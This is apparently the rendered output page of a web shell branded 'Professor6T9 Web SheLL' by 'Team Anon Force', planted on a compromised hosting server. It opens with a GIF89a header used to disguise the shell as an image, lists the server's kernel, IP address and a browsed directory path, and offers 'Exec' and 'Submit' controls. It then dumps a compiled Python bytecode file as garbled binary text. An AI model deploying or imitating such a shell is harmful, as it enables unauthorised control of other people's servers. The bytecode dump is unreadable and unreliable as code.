GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
pyvirtualdisplay
/
__pycache__
[ HOME ]
Exec
Submit
File Name : smartdisplay.cpython-311.pyc
� �|oig � � � d dl Z d dlZd dlmZmZ d dlmZ d dlmZ e j e � � Z G d� de� � Z d� Z G d� d e� � ZdS ) � N)�Image� ImageChops)�grab)�Displayc � � e Zd ZdS )�DisplayTimeoutErrorN)�__name__� __module__�__qualname__� � �o/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/pyvirtualdisplay/smartdisplay.pyr r s � � � � � ��Dr r c � � | j dk r| � d� � } t j d| j |� � }t j | |� � }|� � � }|r| � |� � S dS )z�Crop borders off an image. :param im: Source image. :param bgcolor: Background color, using either a color tuple. :return: An image without borders, or None if there's no actual content in the image. �RGBN) �mode�convertr �new�sizer � difference�getbbox�crop)�im�bgcolor�bg�diff�bboxs r �autocropr ss � � �w�%��� �Z�Z�� � �� ��5�"�'�7� +� +�B�� ��R�(�(�D��<�<�>�>�D�� ��w�w�t�}�}���4r c �$ � e Zd Zd� Zdd�Zdd�ZdS ) �SmartDisplayc �, � t || j � � S )z�Crop borders off an image. :param im: Source image. :return: An image without borders, or None if there's no actual content in the image. )r �_bgcolor)�selfr s r r zSmartDisplay.autocrop"